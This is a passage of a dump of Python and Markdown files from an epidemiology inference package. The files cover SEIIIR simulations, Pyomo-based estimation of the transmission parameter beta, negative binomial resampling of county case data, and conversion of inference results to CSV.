"alphanum_fraction": 0.5560842752456665, "avg_line_length": 34, "blob_id": "1ef6ab8ce3cd6e560ed5a217edafc7ad801e3f04", "content_id": 
"6a912d49949682f76da1102d2d5070d802933bed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1471, "license_type": "no_license", "max_line_length": 90, "num_lines": 42, "path": "/epi_inference/engine/misc.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['save_metadata', 'compute_basename']\n\nimport yaml\nimport datetime\n\n\ndef compute_basename(filename):\n if filename.endswith('.csv') or filename.endswith('.yml') or filename.endswith('jsn'):\n return filename[:-4]\n if filename.endswith('.yaml') or filename.endswith('.json'):\n return filename[:-5]\n return None\n\n\ndef save_metadata(cargs, warnings, data=None):\n #\n # If the YAML data contains an 'output*' file, then \n # create a YAML file with metadata\n #\n ofname = None\n ofname = cargs.get('output',ofname)\n ofname = cargs.get('output_csv',ofname)\n ofname = cargs.get('output_json',ofname)\n if ofname is not None:\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cargs:\n metadata['configuration'][key] = cargs[key]\n if not data is None and len(data) > 0:\n metadata['workflow parameters'] = data\n if len(warnings) > 0:\n metadata['warnings'] = warnings\n #\n basename = compute_basename(ofname)\n if basename is None:\n raise RuntimeError(\"Unknown output suffix: \"+ofname)\n dfile = basename+\"_meta.yml\"\n #\n print(\"Writing file: \"+dfile)\n with open(dfile, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n\n" }, { "alpha_fraction": 0.5928922295570374, "alphanum_fraction": 0.6090725064277649, "avg_line_length": 37.46666717529297, "blob_id": "9f9ca1ba1cba88eb0f020150a555235c231bedaa", "content_id": "8ebfe47bf67aaac27572c2c9e0a5c86a3046ec92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3461, "license_type": "no_license", "max_line_length": 127, "num_lines": 90, "path": "/R_utilities/resample.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import rpy2.robjects as robjects\nimport os\nfrom rpy2.robjects.packages import importr\nimport pandas as pd\nimport numpy as np\nimport rpy2.robjects.numpy2ri\nrpy2.robjects.numpy2ri.activate()\n\nbase = importr('base')\nutils = importr('utils')\n# utils.install_packages('MASS', type='source')\nMASS = importr('MASS')\n\nmain_dir = '../../covid-data/formatted_data/county_data/'\nfolder_name = sorted(os.listdir(main_dir))[-1]\npath = main_dir + '/' + folder_name\n\nwrite_path = '../../covid-data/formatted_data/county_data_resample/' + folder_name + '/'\nif not os.path.exists(write_path):\n os.makedirs(write_path)\n\nrstring=\"\"\"\n function(window_data, low){\n library(MASS)\n fit <- TRUE\n fit <- tryCatch(fitdistr(window_data, 'Negative Binomial', lower = low), \n error = function(cond){\n return(fitted = FALSE)\n })\n if (length(fit) == 1){\n p1 <- mean(window_data)\n p2 <- sd(window_data)\n } else {\n p1 <- as.numeric(fitdistr(window_data, 'Negative Binomial', lower = low)$estimate[2])\n p2 <- as.numeric(fitdistr(window_data, 'Negative Binomial', lower = low)$estimate[1])\n }\n c(p1, p2)\n }\n\"\"\"\nr_fit_negbin = robjects.r(rstring)\n\ncounty_files = sorted(os.listdir(path))\n# Symmetric window, so this is the number of days on either side of the day being calculated,\n# leaving a total window size of 2xwindow + 1 days\nwindow = 3\nn_samples = 100\n\ndef sample_county_negbin(countyfile):\n dat = pd.read_csv(path + '/' + countyfile)\n 
idx_range = list(range((window + 1), dat.shape[0])) # Instead using a symmetric window until the end, then using past data\n\n # If the county has no cases, keep them all at zero\n if dat.Confirmed.iloc[-1] == 0:\n samples_negbin = pd.DataFrame(np.zeros((len(idx_range), n_samples)))\n else:\n initial = dat.Confirmed[0]\n daily_increases = np.array(dat.Confirmed[1:dat.shape[0]] - dat.Confirmed[0:(dat.shape[0] - 1)].values)\n daily = np.concatenate(([initial], daily_increases))\n samples_negbin = pd.DataFrame(columns=['s' + str(i) for i in range(1, 101)])\n r = 0\n for i in range((window + 1), dat.shape[0]):\n if i > dat.shape[0] - window:\n window_data = daily[(len(daily) - (2 * window + 1)): len(daily)]\n else:\n # Using a symmetric window (window size is number of days on either side of date of interest)\n window_data = daily[(i - window):(i + window)]\n if (all(window_data == 0)):\n # Need to force the negative binomial parameters to get a fit in some cases\n params = [0,1]\n else:\n if min(window_data) < 2:\n low = 0.1\n else:\n low = 1\n params = r_fit_negbin(window_data, low)\n samples_negbin.loc[r] = MASS.rnegbin(n_samples, params[0], params[1])\n r += 1\n\n # Reformat: add date and FIPS column, and make a cumulative sum instead of daily counts\n samples_cases = samples_negbin.cumsum()\n Date = pd.DataFrame(dat.Date[(window + 1):dat.shape[0]]).reset_index()\n FIPS = pd.DataFrame(dat.FIPS[(window + 1):dat.shape[0]]).reset_index()\n samples_cases['Date'] = Date.Date\n samples_cases['FIPS'] = FIPS.FIPS\n return samples_cases\n\n\nfor i in county_files:\n resample = sample_county_negbin(i)\n # This returns a dataframe - what do we want to do with it?" }, { "alpha_fraction": 0.7878151535987854, "alphanum_fraction": 0.7878151535987854, "avg_line_length": 25.44444465637207, "blob_id": "7cf93de5dca5b65febd6c816e49ba183012ab486", "content_id": "527199f21e5a580e3f1c2284bde05c12704c35c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 476, "license_type": "no_license", "max_line_length": 83, "num_lines": 18, "path": "/README.md", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference\n\nA python package that supports inference for epidemiology models\n\n## Installation with CONDA (for users)\n\n* conda install pyomo\n* conda install -c conda-forge ipopt\n* python setup.py install\n\n## Installation with CONDA (for developers)\n\n* conda install pyomo\n* conda install -c conda-forge ipopt\n* python setup.py develop\n\nAfter installation, edits in the epi\\_inference software directory will immediately\nchange the installed epi\\_inference python package.\n" }, { "alpha_fraction": 0.5207387208938599, "alphanum_fraction": 0.5343626737594604, "avg_line_length": 46.760868072509766, "blob_id": "8e51866fcc390cd219c847a43304d8f9d22c89d8", "content_id": "4d281cc9a7679852772594cc1568ada8d250474e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6606, "license_type": "no_license", "max_line_length": 167, "num_lines": 138, "path": "/epi_inference/evaluation/reconstruction/single-simulation/simulation_figs.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport os\nfrom datetime import datetime\nfrom epi_inference.formulations.simulation import simulate_discrete_seiiir_stochastic, simulate_continuous_seiiir_deterministic, simulate_discrete_seiiir_deterministic\nimport numpy as np\nimport matplotlib.pyplot 
as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\"\"\"\nThis module runs a deterministic model and compares the results with a number\nof realizations of the stochastic simulation. There is an obvious discrepancy\nthat is a result of the day discretization (instead of using a smaller discretization).\nToDo: rewrite the stochastic simulation to operate over smaller discretizations.\nNote that these simulations are used only in testing, and not part of the results\nproduced by the package.\n\"\"\"\n\ndef generate_simulation_figures(tf, fname):\n output_path = os.path.dirname(fname)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n N=100000\n y0={'S': N, 'E': 0, 'I1': 5, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n rho = 10\n report_delay = 8\n tx = None\n #[0]*tf\n #tx[30] = 1\n\n Cdates,Ccases,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n Ccases = np.round(Ccases).astype(int)\n dfsim_S = pd.DataFrame({'dates': dates, 'values':S}).set_index('dates')\n dfsim_T = pd.DataFrame({'dates': dates, 'values':T}).set_index('dates')\n dfsim_E = pd.DataFrame({'dates': dates, 'values':E}).set_index('dates')\n dfsim_I1 = pd.DataFrame({'dates': dates, 'values':I1}).set_index('dates')\n dfsim_I2 = pd.DataFrame({'dates': dates, 'values':I2}).set_index('dates')\n dfsim_I3 = pd.DataFrame({'dates': dates, 'values':I3}).set_index('dates')\n dfsim_R = pd.DataFrame({'dates': dates, 'values':R}).set_index('dates')\n\n dfstoch_S = None\n dfstoch_T = None\n dfstoch_E = None\n dfstoch_I1 = None\n dfstoch_I2 = None\n dfstoch_I3 = None\n dfstoch_R = None\n for real in range(50):\n# Cdates, Ccases, dates, T, S, E, I1, I2, I3, R = simulate_continuous_seiiir_deterministic(y0, tf, beta=beta,\n# sigma=sigma, gamma=gamma,\n# rho=rho, N=N,\n# report_delay=report_delay,\n# tx=tx)\n Cdates,Ccases,dates,T,S,E,I1,I2,I3,R = simulate_discrete_seiiir_stochastic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n #rdates, rcases, dates, T, S, E, I1, I2, I3, R = stochastic_reconstruction(Cdates, Ccases, N)\n\n if dfstoch_S is None:\n dfstoch_S = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_T = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_E = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I1 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I2 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I3 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_R = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n \n dfstoch_S['{}'.format(real)] = S\n dfstoch_T['{}'.format(real)] = T\n dfstoch_E['{}'.format(real)] = E\n dfstoch_I1['{}'.format(real)] = I1\n dfstoch_I2['{}'.format(real)] = I2\n dfstoch_I3['{}'.format(real)] = I3\n dfstoch_R['{}'.format(real)] = R\n\n with PdfPages(fname) as pdf:\n ax = dfstoch_S.plot(color='silver', legend=False)\n dfsim_S[dfsim_S.index.isin(dfstoch_S.index)].plot(ax=ax, color='black', legend='Simulated S')\n plt.title('S comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_T.plot(color='silver', legend=False)\n dfsim_T[dfsim_T.index.isin(dfstoch_T.index)].plot(ax=ax, color='black', legend='Simulated T')\n plt.title('Comparison of daily transmissions')\n pdf.savefig()\n plt.close()\n \n ax 
= dfstoch_E.plot(color='silver', legend=False)\n dfsim_E[dfsim_E.index.isin(dfstoch_E.index)].plot(ax=ax, color='black', legend='Simulated E')\n plt.title('E comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_I1.plot(color='silver', legend=False)\n dfsim_I1[dfsim_I1.index.isin(dfstoch_I1.index)].plot(ax=ax, color='black', legend='Simulated I1')\n plt.title('I1 comparison')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I2.plot(color='silver', legend=False)\n dfsim_I2[dfsim_I2.index.isin(dfstoch_I2.index)].plot(ax=ax, color='black', legend='Simulated I2')\n plt.title('I2 comparison')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I3.plot(color='silver', legend=False)\n dfsim_I3[dfsim_I3.index.isin(dfstoch_I3.index)].plot(ax=ax, color='black', legend='Simulated I3')\n plt.title('I3 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_R.plot(color='silver', legend=False)\n dfsim_R[dfsim_R.index.isin(dfstoch_R.index)].plot(ax=ax, color='black', legend='Simulated R')\n plt.title('R comparison')\n pdf.savefig()\n plt.close()\n\n #ax = dfstoch_T.cumsum().plot(color='silver', legend=False)\n #dfsim_R.plot(ax=ax, color='black', legend='Simulated R')\n #plt.title('R comparison')\n #pdf.savefig()\n #plt.close()\n\n return\n\nif __name__ == '__main__':\n #np.random.seed(1975)\n generate_simulation_figures(365, './figures/simulations.pdf')\n \n\n \n" }, { "alpha_fraction": 0.6953064799308777, "alphanum_fraction": 0.700435996055603, "avg_line_length": 44.33720779418945, "blob_id": "e595ab00da72d7f6417f843a543de980ad0b4df3", "content_id": "6d8aad9490084a1dc269c933ee9ead70bb8d93a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3899, "license_type": "no_license", "max_line_length": 143, "num_lines": 86, "path": "/epi_inference/formulations/decay_blike.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom datetime import datetime\nimport pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nfrom .decay_lsq import create_inference_formulation_decay\n\n\n# ToDo: add datetime handling to pass in the dates associated with the data\ndef run_decay_blike(cm_rep_cases, population, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This function solves a likelihood inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n cm_rep_cases : list of *new* cases reported in each time period\n Note that this list is 1 entry longer than the transmissions, and \n it must start at zero (based on the assumptions in the reconstruction).\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. 
If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert population > 0\n assert reporting_factor >= 1\n\n # initialize the likelihood model with results from the lsq model\n m = create_inference_formulation_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n report_delay=report_delay, reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose,\n lse=True\n )\n \n # solve the least-squares problem\n solver = SolverFactory('ipopt')\n status = solver.solve(m, tee=verbose)\n \n # Check that the initialization solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error in least-squares initialization.'}\n\n # check that the beta value was successfully solved\n if m.beta.stale == True:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Transmission parameter beta not solved (stale) in least-squares initialization.'}\n\n # deactivate the least-squares objective and activate the likelihood objective\n m.o_like.activate()\n m.o_lse.deactivate()\n\n # solve the likelihood formulation using initialization from the least-squares\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.', 'population':population}\n\n # check that the beta value was successfully solved\n if m.beta.stale == True:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Transmission parameter beta not solved (stale).', 'population':population}\n\n return {'est_beta': value(m.beta),'status': 'ok', 'msg': 'Optimal solution found', 'population':population}\n" }, { "alpha_fraction": 0.5994125008583069, "alphanum_fraction": 0.6177712678909302, "avg_line_length": 39.348148345947266, "blob_id": "1b2efcf02f48c572f4e0d58c3b3f6a00eb2f9c25", "content_id": "e13f41698dd9877496fef8d41c273d1b6a38e58b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5447, "license_type": "no_license", "max_line_length": 175, "num_lines": 135, "path": "/epi_inference/formulations/attic/decay_multibeta_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import assert_optimal_termination\nimport math\n\nfrom ..tseir_utils import compute_compartments_decay\n\n\ndef run_decay_multibeta_lsq(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n print(\"WARNING: THIS MODEL IS NOT TESTED\")\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_decay_multibeta(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose,\n lse=True\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = 
solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n\n results = {}\n for i in m.beta:\n results['est_beta_week'+str(i)] = value(m.beta[i])\n return results\n\ndef create_inference_formulation_decay_multibeta(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False, lse=True):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay model with 3 I compartments. The model is written in terms of absolute numbers of cases (not ln-transform)\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases,\n population=population, sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n assert(len(cumulative_reported_cases) == len(cases))\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n numcases = len(cumulative_reported_cases)\n model.TIMES_beta = pe.Set(initialize=[i for i in range((numcases-1+6)//7)], ordered=True)\n model.beta_offset = 7*((numcases-1+6)//7) - numcases + 1\n model.beta = pe.Var(model.TIMES_beta, initialize=1.3, bounds=(0,None)) # transmission parameter\n ##model.alpha = pe.Var(initialize=1.0)\n ##model.alpha.fix(1.0)\n\n counter = [0]*((numcases-1+6)//7)\n\n #print(len(cases))\n #print(cases)\n #print(\"numcases\", numcases)\n #model.TIMES.pprint()\n #model.TIMES_beta.pprint()\n #print(\"offset\", model.beta_offset)\n\n # define the case count variables\n model.Chat = pe.Var(model.TIMES_m_one, initialize=1.0)\n\n # infection process\n def _infection_process(m, t):\n if t == m.TIMES.last():\n return pe.Constraint.Skip\n counter[(t+model.beta_offset)//7] = counter[(t+model.beta_offset)//7] + 1\n return m.Chat[t+1] == model.beta[(t+model.beta_offset)//7] * (I1[t] + I2[t] + I3[t]) * S[t] / m.N\n model.infection_process = pe.Constraint(model.TIMES, rule=_infection_process)\n\n if lse:\n # least squares objective function\n def _lse(m):\n return sum( (m.Chat[t] - cases[t])**2 for t in m.TIMES_m_one)\n model.o_lse = pe.Objective(rule=_lse)\n\n else:\n # likelihood objective function\n\n #\n # Alternate likelihood function\n #\n #def _like(m):\n #return sum( cases[t]/m.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / m.N)) for t in 
m.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # sum( (S[t]-cases[t])/m.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / m.N)) for t in m.TIMES_m_one)\n\n def _like(m):\n return sum( cases[t]/m.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / m.N)) for t in m.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n sum( (S[t]-cases[t])/m.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / m.N)) for t in m.TIMES_m_one)\n model.o_like = pe.Objective(rule=_like, sense=pe.maximize)\n\n if verbose:\n print(counter)\n\n return model\n" }, { "alpha_fraction": 0.38509318232536316, "alphanum_fraction": 0.7577639818191528, "avg_line_length": 22, "blob_id": "31738b1afa2cc91a7c933fc8a4fcd5785c9bc0f3", "content_id": "a799ecf33f53e77ddba55637df5c9045a54968bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 62, "num_lines": 7, "path": "/examples/expdata/exp2/info.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# Experimental results generated for around_md seeded at 24031\n#\nbeta = 0.6944444444444444\nR0 = 2.7777777777777777\ngamma = 0.25\nsigma = 0.1923076923076923\n" }, { "alpha_fraction": 0.7874395847320557, "alphanum_fraction": 0.7922705411911011, "avg_line_length": 28.571428298950195, "blob_id": "404b5107b2805d059ab1ee241663c337d1f17b15", "content_id": "3d538ec4689a23aa7d59bdc143503f6ee5c938a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 42, "num_lines": 7, "path": "/epi_inference/reconstruction/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.reconstruction\n\nfrom . import recon_deterministic_delay_wf\nfrom . import recon_stochastic_wf\nfrom . import recon_json2csv_wf\nfrom . import recon_summary_wf\nfrom . 
import recon_summary_old_wf\n" }, { "alpha_fraction": 0.573140025138855, "alphanum_fraction": 0.5876362919807434, "avg_line_length": 40.73500061035156, "blob_id": "d63d93790e38476b425234d638ab08a936325ebd", "content_id": "4ea2fa1dd126a7f4b2b9ceea2835dd19498d380b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8347, "license_type": "no_license", "max_line_length": 135, "num_lines": 200, "path": "/epi_inference/workflow/inference_json2csv_by_county_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport csv\nimport glob\nimport pandas as pd\nimport numpy as np\n\nfrom epi_inference.engine.task import Task\nfrom epi_inference.engine.task_registry import register_task\n\ndef create_inference_csv_by_county(input_json_filespec, output_dir, low_inf_threshold, min_data_days_threshold):\n \"\"\"\n This function converts json files created by inference of the stochastic\n reconstruction data and produces csv files for each county\n \"\"\"\n if output_dir and not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n #\n # loop through all the json files and append the necessary fields\n # to a dataframe\n #\n json_filenames = list()\n for filename in glob.glob(input_json_filespec):\n if not os.path.exists(filename):\n raise RuntimeError(\"ERROR: Inference JSON file does not exist: \"+ filename)\n json_filenames.append(filename)\n json_filenames = sorted(json_filenames)\n\n counties_set = None\n county_dfs = dict()\n for j, jsonfname in enumerate(json_filenames):\n with open(jsonfname, 'r') as fd:\n d = json.load(fd)\n\n # this is not the best way to do this - we need to have the seed in the json output\n seed = jsonfname[:-5][-7:]\n try:\n test = int(seed)\n except:\n print('inference_json2csv_by_county currently only works with json'\n ' files produced with inference of stochastic reconstructions'\n ' since it needs the seed')\n raise\n \n print('... 
processing seed', seed, j, '/', len(json_filenames))\n\n # grab a list of counties the first time through\n # to check that each json has the same county list\n if counties_set is None:\n counties_set = set(d.keys())\n sorted_counties = sorted(counties_set)\n\n # check that all counties are included (and only those counties)\n assert sorted(d.keys()) == sorted_counties\n\n # build the county dictionaries for this seed\n for c in sorted_counties:\n dc = dict(d[c])\n dc['FIPS'] = [dc['FIPS']]*len(dc['date'])\n dc['window_days'] = [dc['window_days']]*len(dc['date'])\n dc['seed'] = [seed]*len(dc['date'])\n # change the name from beta to raw_est_beta\n dc['raw_est_beta'] = dc['beta']\n del dc['beta']\n # get the dates, changing the name from date to dates\n dc['dates'] = dc['date']\n del dc['date']\n\n # build the filtered data\n low_inf = list()\n low_data_days = list()\n filtered_est_beta = list()\n for i in range(len(dc['dates'])):\n inf = dc['infections_in_window'][i]\n data_days = dc['days_since_first_reported'][i]\n filtered_beta = dc['raw_est_beta'][i]\n if inf < low_inf_threshold:\n low_inf.append(True)\n filtered_beta = None\n else:\n low_inf.append(False)\n\n if data_days < min_data_days_threshold:\n low_data_days.append(True)\n filtered_beta = None\n else:\n low_data_days.append(False)\n\n filtered_est_beta.append(filtered_beta)\n dc['low_infections_in_window(<{})'.format(low_inf_threshold)] = low_inf\n dc['low_data_days(<{}days)'.format(min_data_days_threshold)] = low_data_days\n dc['filtered_est_beta'] = filtered_est_beta\n\n dfc = pd.DataFrame(dc)\n dfc.fillna(value=np.nan, inplace=True)\n if c not in county_dfs:\n county_dfs[c] = dict()\n\n county_dfs[c][seed] = dfc\n\n\n description_file = os.path.join(output_dir, 'inference_description.txt')\n fd = open(description_file, 'w')\n \n for i,c in enumerate(sorted_counties):\n print('... 
processing county', c, i, '/', len(sorted_counties))\n\n # concatenate across all the seeds\n county_df = pd.concat(county_dfs[c].values())\n\n print('County:', c)\n description_str = county_df.describe(include=None, exclude=[list])\n fd.write(description_str.to_string())\n fd.write('\\n')\n\n fname = os.path.join(output_dir, 'estimated_beta_county_{}.csv'.format(c))\n county_df.to_csv(fname, quoting=csv.QUOTE_NONNUMERIC, index=False)\n\n # get the status across the seeds\n q05_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.05)\n q05_raw.rename('q05_raw_est_beta', inplace=True)\n q25_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.25)\n q25_raw.rename('q25_raw_est_beta', inplace=True)\n q50_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.50)\n q50_raw.rename('q50_raw_est_beta', inplace=True)\n qmean_raw = county_df.groupby('dates')['raw_est_beta'].mean()\n qmean_raw.rename('qmean_raw_est_beta', inplace=True)\n q75_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.75)\n q75_raw.rename('q75_raw_est_beta', inplace=True)\n q95_raw = county_df.groupby('dates')['raw_est_beta'].quantile(.95)\n q95_raw.rename('q95_raw_est_beta', inplace=True)\n\n q05_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.05)\n q05_filtered.rename('q05_filtered_est_beta', inplace=True)\n q25_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.25)\n q25_filtered.rename('q25_filtered_est_beta', inplace=True)\n q50_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.50)\n q50_filtered.rename('q50_filtered_est_beta', inplace=True)\n qmean_filtered = county_df.groupby('dates')['filtered_est_beta'].mean()\n qmean_filtered.rename('qmean_filtered_est_beta', inplace=True)\n q75_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.75)\n q75_filtered.rename('q75_filtered_est_beta', inplace=True)\n q95_filtered = county_df.groupby('dates')['filtered_est_beta'].quantile(.95)\n q95_filtered.rename('q95_filtered_est_beta', inplace=True)\n\n county_df_summary = pd.concat([q05_filtered, q25_filtered,\n q50_filtered, q75_filtered,\n q95_filtered, qmean_filtered,\n q05_raw, q25_raw,\n q50_raw, q75_raw,\n q95_raw, qmean_raw],\n axis=1)\n county_df_summary = county_df_summary.reset_index()\n\n fname = os.path.join(output_dir, 'summary_estimated_beta_county_{}.csv'.format(c))\n county_df_summary.to_csv(fname, quoting=csv.QUOTE_NONNUMERIC, index=False)\n\n fd.close()\n\n\nclass Inference_JSON2CSV_By_County_Workflow(Task):\n def __init__(self):\n Task.__init__(self, \"inference_json2csv_by_county\",\n \"Create a CSV file of inference results for each county.\")\n\n def validate(self, CONFIG):\n valid_options = set(['input_json', 'output_dir', 'low_infection_threshold', 'factors', 'factor_levels', 'workflow', 'verbose'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n pd.set_option('display.max_columns', None)\n pd.set_option('display.width', 1000)\n self._warnings = []\n self.validate(CONFIG)\n create_inference_csv_by_county(\n input_json_filespec=CONFIG['input_json'],\n output_dir=CONFIG.get('output_dir', None),\n low_inf_threshold=int(CONFIG.get('low_infection_threshold', 0)),\n min_data_days_threshold=int(CONFIG.get('min_data_days_threshold', 14))\n )\n\nregister_task(Inference_JSON2CSV_By_County_Workflow())\n\nif __name__ == '__main__':\n json_filespec = sys.argv[1]\n output_dir = './json2csv-test-results'\n 
low_infection_threshold = 100\n create_inference_csv_by_county(\n input_json_filespec=json_filespec,\n output_dir=output_dir,\n low_inf_threshold=low_infection_threshold,\n min_data_days_threshold=14\n )\n" }, { "alpha_fraction": 0.6295040249824524, "alphanum_fraction": 0.6425038576126099, "avg_line_length": 50.28260803222656, "blob_id": "d826cab86b101603400eb9254b5e8d947c95b850", "content_id": "e10fafb8a8ab25366b72862f498a0ded944dc908", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21231, "license_type": "no_license", "max_line_length": 154, "num_lines": 414, "path": "/epi_inference/reconstruction/stochastic.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport math\nfrom pyutilib.misc.misc import Bunch\n\ndef stochastic_reconstruction(*, dates, reported_cases_per_day, population, n_steps_per_day,\n 